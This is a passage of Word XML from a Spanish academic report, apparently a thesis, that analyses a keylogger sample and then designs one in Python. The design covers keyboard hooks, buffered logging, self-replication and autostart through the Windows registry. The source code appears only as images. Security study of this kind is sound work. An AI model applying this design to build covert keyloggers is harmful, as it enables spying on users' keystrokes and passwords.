            <wp:effectExtent l="114300" t="114300" r="111760"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327200" cy="220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bookmarkStart w:id="225" w:name="_Toc19358244"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>105</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Grabación de datos del keylogger en el fichero en disco.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>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lastRenderedPageBreak/>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2D87C590" wp14:editId="4CB2F14A">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bookmarkStart w:id="226" w:name="_Toc19358245"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>106</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Copia de teclas virtuales sobre buffer de memoria.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="226"/>
    </w:p>
    <w:p w:rsidR="0036746F" w:rsidRPr="00C11C8C" w:rsidRDefault="0036746F" w:rsidP="00C11C8C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>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07DF84C5" wp14:editId="24F527B9">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bookmarkStart w:id="227" w:name="_Toc19358246"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>107</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Funciones </w:t>
      </w:r>
      <w:r w:rsidR="00E71F4F">
        <w:t>de detección de tipo de teclado y mapeado de teclas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>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w:t>
      </w:r>
      <w:r w:rsidR="002F459C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">nstale o desactive el keylogger y que puede estar relacionado con la llamada que hemos visto al principio a </w:t>
      </w:r>
      <w:r w:rsidR="002F459C" w:rsidRPr="00786A43">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>UnhookWindowsHookExw</w:t>
      </w:r>
      <w:r w:rsidR="002F459C">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C51DEF" w:rsidRDefault="00C51DEF" w:rsidP="00C51DEF">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C01B9D9" wp14:editId="1943AB47">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bookmarkStart w:id="228" w:name="_Toc19358247"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>108</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Zona de memoria donde se hace referencia a un archivo o carpeta llamado SPUNINST</w:t>
      </w:r>
      <w:bookmarkEnd w:id="228"/>
    </w:p>
    <w:p w:rsidR="00C51DEF" w:rsidRPr="00C51DEF" w:rsidRDefault="00B54569" w:rsidP="00C51DEF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Cerramos en este punto el análisis dinámico, aunque se podría profundizar mucho más.</w:t>
      </w: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B029AB" w:rsidRPr="00853E9A" w:rsidRDefault="00231F20" w:rsidP="00550235">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="229" w:name="__RefHeading___Toc933_3518492859"/>
      <w:bookmarkStart w:id="230" w:name="_Toc18453530"/>
      <w:bookmarkStart w:id="231" w:name="_Toc19810083"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Desarrollo de </w:t>
      </w:r>
      <w:r w:rsidR="00F95BF7">
        <w:t>un</w:t>
      </w:r>
      <w:r w:rsidRPr="00853E9A">
        <w:t xml:space="preserve"> Keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
      <w:bookmarkEnd w:id="230"/>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w:rsidR="00F71445" w:rsidRDefault="00B47A2C" w:rsidP="00F71445">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="__RefHeading___Toc935_3518492859"/>
      <w:r>
        <w:t xml:space="preserve">En este apartado llevaremos a cabo </w:t>
      </w:r>
      <w:r w:rsidR="002812DA">
        <w:t>la descripción d</w:t>
      </w:r>
      <w:r>
        <w:t>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33" w:name="_Toc18453531"/>
      <w:bookmarkStart w:id="234" w:name="_Toc19810084"/>
      <w:r>
        <w:t>Lenguaje elegido para el desarrollo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
      <w:bookmarkEnd w:id="234"/>
      <w:r w:rsidR="00231F20" w:rsidRPr="00853E9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="235" w:name="__RefHeading___Toc937_3518492859"/>
      <w:bookmarkEnd w:id="23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F54717" w:rsidP="00273238">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Previo al desarrollo final, se han realizado pequeños códigos de prueba para el keylogger y para los procesos de comunicación en red. </w:t>
      </w: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36" w:name="_Toc18453532"/>
      <w:bookmarkStart w:id="237" w:name="_Toc19810085"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>El</w:t>
      </w:r>
      <w:r w:rsidRPr="00853E9A">
        <w:t xml:space="preserve"> Keylogger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> más corto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
      <w:bookmarkEnd w:id="237"/>
    </w:p>
    <w:p w:rsidR="002C29F0" w:rsidRDefault="002C29F0" w:rsidP="00F71445">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">¿Cuál sería el código del keylogger más simple? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C29F0" w:rsidRDefault="00F54717" w:rsidP="00F71445">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="002C29F0">
        <w:t>e puede escribir un keylogger en Python</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1638253287"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D663B5">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B3597D">
            <w:instrText xml:space="preserve">CITATION Gab19 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D663B5">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[84]</w:t>
          </w:r>
          <w:r w:rsidR="00D663B5">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="002C29F0">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540E7691" wp14:editId="49E78638">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38" w:name="_Toc19358248"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>109</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Ejemplo de código más corto de keylogger en Python.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="238"/>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w:t>
      </w:r>
      <w:r w:rsidR="00F54717">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>genera un archivo de texto plan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">o, con todas las pulsaciones de teclado estándar, pero con la limitación de que </w:t>
      </w:r>
      <w:r w:rsidR="00A7306B">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">los </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>caracteres especiales como (borrado hacia atrás) quedan guardados con su código binario y se muestran “extraños” en el archivo de texto, y otros caracteres como letras acentuadas no se registran correctamente, al mismo tiempo que tampoco se reproducen correctamente en pantalla, evidenciando al usuario de que algo mal funciona en el sistema.</w:t>
      </w:r>
      <w:r w:rsidR="00A7306B">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Solo guarda los datos en un archivo de </w:t>
      </w:r>
      <w:r w:rsidR="00A7306B">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>texto, y no hace ningún envío por red, por lo que para ver el contenido registrado hay que acceder al mismo equipo para ver el contenido del archivo. Para guardar los datos en el archivo se apoya en las mismas funciones que tiene Python para crear logs de archivos para depuración o control de procesos en las aplicaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3EA3" w:rsidRDefault="00FF3EA3" w:rsidP="00A7306B">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sidR="00ED53AD">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> en tres puntos:</w:t>
      </w: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w:t>
      </w:r>
      <w:r w:rsidR="00A37EB8">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> que hemos nombrado son claves para entender el funcionamiento</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>.</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End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DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t>[85]</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End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DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t>[8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5215019D" wp14:editId="0AEBB3C3">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39" w:name="_Toc19358249"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>110</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ejemplo de keylogger en ocho </w:t>
      </w:r>
      <w:r w:rsidR="005758EE">
        <w:t>líneas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de código usando librería pynput.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>caracteres especiales con este código</w:t>
      </w:r>
      <w:r w:rsidR="00771123">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> resumido, y tenemos el problema añadido que el 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0F5BFD82" wp14:editId="57192A82">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40" w:name="_Toc19358250"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>111</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra ficheros de texto g</w:t>
      </w:r>
      <w:r w:rsidR="00E84B15">
        <w:t>enerados por los dos ejemplos d</w:t>
      </w:r>
      <w:r>
        <w:t>e keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="240"/>
    </w:p>
    <w:p w:rsidR="00FF6DC1" w:rsidRDefault="00F83E97" w:rsidP="00F71445">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Cualquiera de los dos ejemplos puede servir de punto de partida para la creación de nuestro keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRPr="007246EB" w:rsidRDefault="00F83E97" w:rsidP="007246EB">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="241" w:name="_Toc18453533"/>
      <w:bookmarkStart w:id="242" w:name="_Toc19810086"/>
      <w:r w:rsidRPr="007246EB">
        <w:t>Características</w:t>
      </w:r>
      <w:r w:rsidR="00231F20" w:rsidRPr="007246EB">
        <w:t xml:space="preserve"> del Keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
      <w:bookmarkEnd w:id="241"/>
      <w:bookmarkEnd w:id="242"/>
    </w:p>
    <w:p w:rsidR="002E1567" w:rsidRDefault="002E1567" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:bookmarkStart w:id="243"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 xml:space="preserve">necesite </w:t>
      </w:r>
      <w:r w:rsidR="00A37EB8">
        <w:t xml:space="preserve">algunos </w:t>
      </w:r>
      <w:r>
        <w:t>cambio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907006" w:rsidRDefault="00907006" w:rsidP="00907006">
      <w:pPr>
        <w:pStyle w:val="Listacomprimida"/>
      </w:pPr>
      <w:r w:rsidRPr="00907006">
        <w:t>Capacidad para autoreplicarse y configurar Registro de Windows para autoiniciarse.</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44" w:name="_Toc18453534"/>
      <w:bookmarkStart w:id="245" w:name="_Toc19810087"/>
      <w:r w:rsidRPr="007246EB">
        <w:lastRenderedPageBreak/>
        <w:t>Módulos necesario</w:t>
      </w:r>
      <w:r w:rsidR="00A674FC" w:rsidRPr="007246EB">
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
      <w:bookmarkEnd w:id="245"/>
    </w:p>
    <w:p w:rsidR="00A674FC" w:rsidRDefault="003205F5" w:rsidP="00A674FC">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>No vamos a indicar aquí todos los paquetes, librerías o módulos necesarios. Son diversos y observando el código fuente se puede</w:t>
      </w:r>
      <w:r w:rsidR="00A37EB8">
        <w:t>n ver. Pero sí que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vamos a indicar algunos que son relevantes e indicaremos para que funciones se usan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A674FC" w:rsidRDefault="00A674FC" w:rsidP="00797CE9">
      <w:pPr>
        <w:pStyle w:val="Listacomprimida"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pythoncom </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-706711870"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Tim \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[87]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="003205F5" w:rsidRDefault="003205F5" w:rsidP="003205F5">
      <w:pPr>
        <w:pStyle w:val="Listacomprimida"/>
      </w:pPr>
      <w:r>
        <w:t>pyWinHook</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1997341852"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00984D40">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00984D40">
            <w:instrText xml:space="preserve"> CITATION pyW \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00984D40">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[88]</w:t>
          </w:r>
          <w:r w:rsidR="00984D40">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="003205F5" w:rsidRDefault="003205F5" w:rsidP="003205F5">
      <w:pPr>
        <w:pStyle w:val="Listacomprimida"/>
      </w:pPr>
      <w:r>
        <w:t>pynput</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2133975534"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION pyn \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[85]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="003205F5" w:rsidRDefault="003205F5" w:rsidP="003205F5">
      <w:pPr>
        <w:pStyle w:val="Listacomprimida"/>
      </w:pPr>
      <w:r>
        <w:t>winreg</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1189798945"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008F73DD">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008F73DD">
            <w:instrText xml:space="preserve"> CITATION win \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="008F73DD">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[89]</w:t>
          </w:r>
          <w:r w:rsidR="008F73DD">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="003205F5" w:rsidRDefault="003205F5" w:rsidP="003205F5">
      <w:pPr>
        <w:pStyle w:val="Listacomprimida"/>
      </w:pPr>
      <w:r>
        <w:t>win32console</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1635632065"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C938A2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C938A2">
            <w:instrText xml:space="preserve"> CITATION Mod \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C938A2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[90]</w:t>
          </w:r>
          <w:r w:rsidR="00C938A2">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00A674FC" w:rsidRDefault="001030F6" w:rsidP="003205F5">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF6DC1">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>pythoncom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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rsidRPr="00FF6DC1">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>pyWinHook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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rsidRPr="00FF6DC1">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>pynput</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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rsidRPr="00FF6DC1">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>winreg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nos permitirá leer y escribir en el registro de Windows y con ello poder establecer una clave de registro para hacer que el keylogger se ejecute automáticamente en cada inicio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00102FD6" w:rsidRDefault="00102FD6" w:rsidP="003205F5">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF6DC1">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>win32console</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserv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46" w:name="_Toc18453535"/>
      <w:bookmarkStart w:id="247" w:name="_Toc19810088"/>
      <w:r w:rsidRPr="007246EB">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="005A10E0" w:rsidRPr="007246EB">
        <w:t>artes importantes del desarrollo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="246"/>
      <w:bookmarkEnd w:id="247"/>
    </w:p>
    <w:p w:rsidR="00B50DBE" w:rsidRDefault="003869C5" w:rsidP="00B50DBE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Pasamos a describir aquí las partes más relevantes de la aplicación y factores a tener en cuenta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE0681" w:rsidRDefault="00BE0681" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="248" w:name="_Toc19810089"/>
      <w:r>
        <w:t>Notas previas sobre comentarios y mensajes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
    <w:p w:rsidR="00BE0681" w:rsidRPr="00BE0681" w:rsidRDefault="00BE0681" w:rsidP="00BE0681">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Aunque la aplicación muestra algunos mensajes en Castellano, se ha optado por usar el Inglés en todos los comentarios en el código fuente de la aplicación y en la información de ayuda de los parámetros de línea de comando.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37EB8" w:rsidRDefault="00A37EB8" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="_Toc19810090"/>
      <w:r>
        <w:t>Algunos conceptos clave de la aplicación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p w:rsidR="00A37EB8" w:rsidRDefault="00A37EB8" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>La mayoría de keyloggers crean un solo archivo de registro, el cual se actualiza a cada pulsación de tecla. Esto</w:t>
      </w:r>
      <w:r w:rsidR="000011AF">
        <w:t xml:space="preserve"> genera una actividad constante de grabación en disco y puede impactar en el rendimiento del sistema si además se realizan otras opciones. Así que nuestro planteamiento es que el keylogger ira registrando todas las pulsaciones de teclas (o información adicional que se requiera) en memoria, sobre un string. El </w:t>
      </w:r>
      <w:r w:rsidR="000011AF">
        <w:lastRenderedPageBreak/>
        <w:t>contenido de este string será volcado a disco en una sola operación de escritura, cuando llegue a un tamaño determinado que estará definido</w:t>
      </w:r>
      <w:r w:rsidR="008A64C1">
        <w:t xml:space="preserve"> por un parámetro</w:t>
      </w:r>
      <w:r w:rsidR="000011AF">
        <w:t xml:space="preserve"> en el código, reduciendo </w:t>
      </w:r>
      <w:r w:rsidR="00C62DDD">
        <w:t>de esta manera el número de accesos a disco</w:t>
      </w:r>
      <w:r w:rsidR="000011AF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000011AF" w:rsidRDefault="000011AF" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Existirá además otro valor, también</w:t>
      </w:r>
      <w:r w:rsidR="00C62DDD">
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r w:rsidR="008A64C1">
        <w:t>efinido por otro parámetro</w:t>
      </w:r>
